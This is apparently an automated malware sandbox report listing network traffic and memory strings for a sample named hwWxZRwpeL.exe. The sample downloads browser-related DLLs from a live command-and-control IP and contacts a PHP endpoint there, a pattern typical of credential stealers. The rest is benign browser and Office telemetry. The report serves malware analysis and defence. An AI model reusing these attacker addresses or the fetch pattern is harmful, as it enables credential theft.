                      Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 77.83.175.105Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /4db719b1f2f948b0/sqlite3.dll HTTP/1.1Host: 77.83.175.105Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /4db719b1f2f948b0/freebl3.dll HTTP/1.1Host: 77.83.175.105Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /4db719b1f2f948b0/mozglue.dll HTTP/1.1Host: 77.83.175.105Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /4db719b1f2f948b0/msvcp140.dll HTTP/1.1Host: 77.83.175.105Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /4db719b1f2f948b0/nss3.dll HTTP/1.1Host: 77.83.175.105Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /4db719b1f2f948b0/softokn3.dll HTTP/1.1Host: 77.83.175.105Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /4db719b1f2f948b0/vcruntime140.dll HTTP/1.1Host: 77.83.175.105Cache-Control: no-cache
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                      Source: 000003.log5.9.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                      Source: 000003.log5.9.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
                      Source: 000003.log5.9.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
                      Source: chrome.exe, 00000002.00000003.2130051118.00002B4400FC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2129865991.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2130100299.00002B4400F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                      Source: chrome.exe, 00000002.00000003.2130051118.00002B4400FC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2129865991.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2130100299.00002B4400F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                      Source: chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2150785587.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                      Source: chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2150785587.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/< equals www.youtube.com (Youtube)
                      Source: chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2150785587.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                      Source: global trafficDNS traffic detected: DNS query: www.google.com
                      Source: global trafficDNS traffic detected: DNS query: apis.google.com
                      Source: global trafficDNS traffic detected: DNS query: play.google.com
                      Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                      Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                      Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                      Source: global trafficDNS traffic detected: DNS query: c.msn.com
                      Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                      Source: global trafficDNS traffic detected: DNS query: api.msn.com
                      Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                      Source: global trafficDNS traffic detected: DNS query: campuspersever.es
                      Source: unknownHTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 904sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Oct 2024 21:02:48 GMTContent-Type: text/htmlContent-Length: 34449Connection: closeLast-Modified: Sat, 10 Aug 2024 16:10:36 GMTETag: "8691-61f568015d78a"Accept-Ranges: bytes
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000078E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2610154888.0000000027EE0000.00000004.00000020.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.php
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2610154888.0000000027EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.phpLR#
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2610154888.0000000027EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.phpW
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.phpWindows
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2610154888.0000000027EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.phpe
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.phpition:
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2610154888.0000000027EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.phpop:
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2610154888.0000000027EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.phpp
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2610154888.0000000027EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.phpx
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/4db719b1f2f948b0/freebl3.dllC
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/4db719b1f2f948b0/freebl3.dllM
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/4db719b1f2f948b0/mozglue.dllc
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/4db719b1f2f948b0/mozglue.dlli
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/4db719b1f2f948b0/msvcp140.dll
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/4db719b1f2f948b0/msvcp140.dllm
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/4db719b1f2f948b0/nss3.dll
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/4db719b1f2f948b0/softokn3.dll
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/4db719b1f2f948b0/softokn3.dllQ
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://77.83.175.105/4db719b1f2f948b0/sqlite3.dll
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/4db719b1f2f948b0/sqlite3.dll3
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/4db719b1f2f948b0/sqlite3.dll_
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/4db719b1f2f948b0/vcruntime140.dll
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105/4db719b1f2f948b0/vcruntime140.dllm
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://77.83.175.10518a9a962225b1ffb.phpition:
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000078E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.83.175.105F
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
